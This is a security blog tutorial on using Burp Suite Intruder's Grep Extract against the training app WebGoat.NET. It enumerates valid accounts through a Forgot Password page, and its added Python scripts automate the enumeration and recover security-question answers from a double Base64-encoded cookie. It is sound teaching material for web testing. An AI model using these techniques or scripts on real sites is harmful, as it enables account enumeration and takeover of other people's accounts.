13 Aug, 2014

Intro to BurpSuite V: Extracting Intrusions

by Ken Toler

Hi, Folks,

Since the last post on Intruder, I’ve been seeing questions come up about how to pull specific data out of a large number of results. I wanted to put together a quick post on how you can use some of the more advanced Intruder options to pull that information out automatically. One suggestion that comes straight from PortSwigger is to use the Grep Extract option to lift data out of each response.

Today, I’m going to demonstrate this functionality using WebGOAT.NET, a project that’s freely available on OWASP and Github so you can follow along.

First, this post picks up where Intro to BurpSuite IV left off with Intruder, so refresh your memory of that one here.

The GOAT

Now to get started, we’re going to use the Forgot Password function over in the Customer section.

To use it, we enter a valid email address into the form field, and the site presents us with that account's Forgot Password question.

So let’s assume for a moment that we have a large number of target email addresses. That isn’t far-fetched: sites like LinkedIn make it easy to harvest names, and many users publish their work email addresses. On a legitimate company pentest, you could build a long address list quickly by guessing the company's address format or looking up public profiles.

Let’s take a look at Intruder and see how we might be able to automate the enumeration of these questions so we can start guessing the answers.

Setup

We set up Intruder as normal by capturing the request and defining the payload position (as mentioned in the previous Intruder article). In this case, we are attacking the email parameter.

Now we head over to the Payloads tab and add our simple list of email addresses. To keep the output easy to read, the list has two known-good emails and two known-bad ones.

Next, head over to the Options tab to take advantage of Grep Extract. First, make sure the checkbox labelled “Extract the following items from responses:” is ticked.

Then click the “Add” button.

Once you click “Add”, you’re presented with a dialog where you can either write a regex or use the simpler form: a string that marks the start of the match and a delimiter that marks its end. We know from the response we saw earlier that the site says “Here is the question we have on file for you:” and then prints the question, so we can use this to pull out whatever immediately follows that sentence.

We use “file for you: ” (including the colon and the trailing space) as the start string, and the question mark as the end delimiter, because every question the site generates ends with one. Once we click “OK”, Burp adds a column for the extracted text to the results table.

The Attack

Now go to the Intruder menu at the top of Burp and choose Start attack.

Now we are presented with a Results window, and look! There are our questions.

Now you can start guessing the answers to those questions and recover some passwords.
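For anyone who wants to see exactly what Burp is doing with that start string and delimiter, here is an added Python example (not code from the original post, from Burp or from WebGoat.NET) that runs the same attack over a batch of responses and builds the same columns Intruder shows. The four HTTP responses are constructed to resemble the Forgot Password page described above; the example.com addresses, the page markup and the error text are assumptions.

```python
"""Emulate an Intruder run with a Grep Extract column, outside Burp.

Added example, not code from the original post, from Burp or from
WebGoat.NET. The four HTTP responses below are constructed to resemble
the Forgot Password page described above; the real page's markup and
error text are assumptions.
"""
from typing import Callable, Dict, List, Optional

# Constructed responses, keyed by the email address that would be sent as
# the Intruder payload. Known-good addresses get the question back (and a
# Set-Cookie header); known-bad ones get an error page and no cookie.
RESPONSES: Dict[str, str] = {
    "alice@example.com": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "Set-Cookie: encr_sec_qu_ans=VW1Waw==; path=/\r\n"
        "\r\n"
        "<p>Here is the question we have on file for you: "
        "What is your favorite color?</p>"
    ),
    "bob@example.com": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "Set-Cookie: encr_sec_qu_ans=Um14MVptWjU=; path=/\r\n"
        "\r\n"
        "<p>Here is the question we have on file for you: "
        "What was the name of your first pet?</p>"
    ),
    "nobody@example.com": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<p>Sorry, we could not find that email address.</p>"
    ),
    "typo@exmaple.com": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<p>Sorry, we could not find that email address.</p>"
    ),
}


def grep_extract(response: str, start: str, end: str, max_length: int = 100) -> Optional[str]:
    """Mimic the simplified Grep Extract form: the text after the first
    occurrence of `start`, up to (not including) the next `end`, capped at
    `max_length` like Burp's "maximum length" field. None when `start` is
    absent, which Burp shows as an empty cell."""
    i = response.find(start)
    if i == -1:
        return None
    i += len(start)
    j = response.find(end, i)
    if j == -1:
        j = len(response)
    return response[i:j][:max_length]


def run_attack(payloads: List[str], send: Callable[[str], str]) -> List[dict]:
    """One request per payload, building the columns the Intruder results
    table shows: payload, status, response length and the extracted question.
    `send` is the swap point: here it looks up a constructed response; against
    a live target it would POST the email and return the raw response."""
    rows = []
    for email in payloads:
        resp = send(email)
        status = resp.split(" ", 2)[1]          # "200" from the status line
        rows.append({
            "payload": email,
            "status": status,
            "length": len(resp),
            "question": grep_extract(resp, "file for you: ", "?"),
        })
    return rows


def valid_accounts(rows: List[dict]) -> List[str]:
    """Payloads that got a question back. The status code alone does not
    separate good from bad here (every response is a 200), so the extracted
    column is what makes the enumeration explicit."""
    return [r["payload"] for r in rows if r["question"] is not None]


if __name__ == "__main__":
    rows = run_attack(list(RESPONSES), RESPONSES.__getitem__)
    for r in rows:
        print(f'{r["payload"]:22} {r["status"]} {r["length"]:5} {r["question"] or ""}')
    print("valid:", valid_accounts(rows))
```

The `send` callable is deliberately the only thing that touches the "network": replacing it with a function that posts to the real form turns the script into a live run, while everything else (the extraction and the result table) behaves exactly as it does offline.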

But Wait… There’s More!

But wait a second: if we double-click a result, we can examine the individual response. Look closely and you may notice that the server sets a cookie for every valid email and does NOT set one for any invalid email. On its own, that is already a user-enumeration oracle: the presence or absence of the Set-Cookie header tells valid addresses from invalid ones even if the question text were hidden. Can we use the cookie itself, though?

Let’s repeat the process and add a second extraction alongside the question. This time, instead of the question lead-in as the start and the question mark as the delimiter, we use “encr_sec_qu_ans=” as the start and “;” as the delimiter, which pulls the value of that cookie out of each response.

With that added, let’s launch the attack again.

Nice, it looks like we may have the answers, but they look pretty random. Let’s put one of them into Decoder to see whether it is encoded somehow. My usual first guesses here are HTML encoding or Base64; since there are no HTML entities in the value, let’s try Base64.

Decoding our Results

Using Decoder is as simple as pasting a value and choosing a decoding scheme from the drop-down; here we choose Base64. Decoding gives us another mangled value, so at first glance we may be tempted to throw it away. However, it still looks like Base64: the characters all come from the Base64 alphabet and the trailing “==” is Base64 padding. Let’s decode again; maybe they’re double-encoding the value.

Nice! It looks like they were. Note what that means: the cookie name says “encr”, but double Base64 is encoding, not encryption, so anyone who receives the cookie can recover the answer without any key. The application hands the security-question answer to the client before the client has answered anything. With a list of valid email addresses for this site, we could answer the question for any account and log in as any of them. I hope this helped you understand a little more about Intruder. Until next time, send me a question or two about what you’d like to see next in the series. We’ll be getting into some more advanced topics soon.
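For readers who would rather script the cookie step than paste each value into Decoder one at a time, here is an added Python example (not code from the original post or from Burp) that pulls the cookie out of the Set-Cookie header and peels off nested Base64 until plaintext appears. The response is constructed; its cookie value VW1Waw== is the answer "Red" Base64-encoded twice, chosen here to stand in for whatever the real application returns, and the printable-text stopping rule is an assumption about what a decoded answer looks like.

```python
"""Extract the encr_sec_qu_ans cookie from a response and peel off the
nested Base64, which is what the Decoder step above does by hand.

Added example, not code from the original post or from Burp. The response
is constructed; its cookie value VW1Waw== is the answer "Red" Base64-encoded
twice, chosen here to stand in for whatever the real application returns.
"""
import base64
import binascii
from typing import List, Optional

SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: encr_sec_qu_ans=VW1Waw==; path=/\r\n"
    "\r\n"
    "<p>Here is the question we have on file for you: "
    "What is your favorite color?</p>"
)


def cookie_from_response(response: str, name: str) -> Optional[str]:
    """Value of cookie `name` from the first Set-Cookie header that sets it.
    Only the header block is searched, unlike a start/delimiter grep over the
    whole response, so the same string appearing in the body is not mistaken
    for a cookie."""
    headers, _, _ = response.partition("\r\n\r\n")
    for line in headers.split("\r\n"):
        key, _, rest = line.partition(":")
        if key.strip().lower() != "set-cookie":
            continue
        pair = rest.strip().split(";", 1)[0]      # drop path/expires attributes
        cname, _, cval = pair.partition("=")
        if cname.strip() == name:
            return cval.strip()
    return None


def peel_base64(value: str, max_rounds: int = 5) -> List[str]:
    """Decode repeatedly while each result is valid Base64 that yields
    printable text, and return the successive layers (innermost last).
    Heuristic (an assumption): a short plaintext made only of Base64
    characters can decode once more by accident, so stop on anything that
    is invalid Base64 or not printable ASCII."""
    layers: List[str] = []
    current = value
    for _ in range(max_rounds):
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break
        if not decoded or not decoded.isprintable():
            break
        layers.append(decoded)
        current = decoded
    return layers


def answer_from_response(response: str) -> Optional[str]:
    """The recovered security-question answer, or None if no cookie was set
    (an invalid address) or the value did not decode."""
    value = cookie_from_response(response, "encr_sec_qu_ans")
    if value is None:
        return None
    layers = peel_base64(value)
    return layers[-1] if layers else None


if __name__ == "__main__":
    raw = cookie_from_response(SAMPLE_RESPONSE, "encr_sec_qu_ans")
    print("cookie :", raw)
    for depth, layer in enumerate(peel_base64(raw), 1):
        print(f"layer {depth}:", layer)
    print("answer :", answer_from_response(SAMPLE_RESPONSE))
```

Parsing the header block rather than grepping the whole response is the one place this is stricter than the start/delimiter extraction in Burp: a page body that happened to contain “encr_sec_qu_ans=” would fool the grep but not the header parser.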

For more information on using Burp’s Grep Extract functionality, check out John Poulin’s great post on using Recursive Grep to Test CSRF Protected Applications.

Ken is a Senior Security Consultant at nVisium. He works hard to defend our clients’ web applications and provide real solutions to their security concerns. Ken loves his technology and can always be found researching new languages, gadgets, applications, and hardware. Ken began his career in software product management, but quickly realized he’d rather be down in the weeds. Armed with the project management mindset, he dove head first into networking and development, and came out with a passion for security.

Ken is creative at heart and has an innate desire to provide an environment where clients are excited to learn about and implement good, proactive, and efficient security practices that complement an organization rather than hold it back. Ken has worked in the IT industry for 7 years for companies such as HyperOffice, LivingSocial, Citrix and even the US ARMY, which has enabled him to gain experience in all walks of business from a humble startup to a fully fledged enterprise, and he loves every waking second of what he does.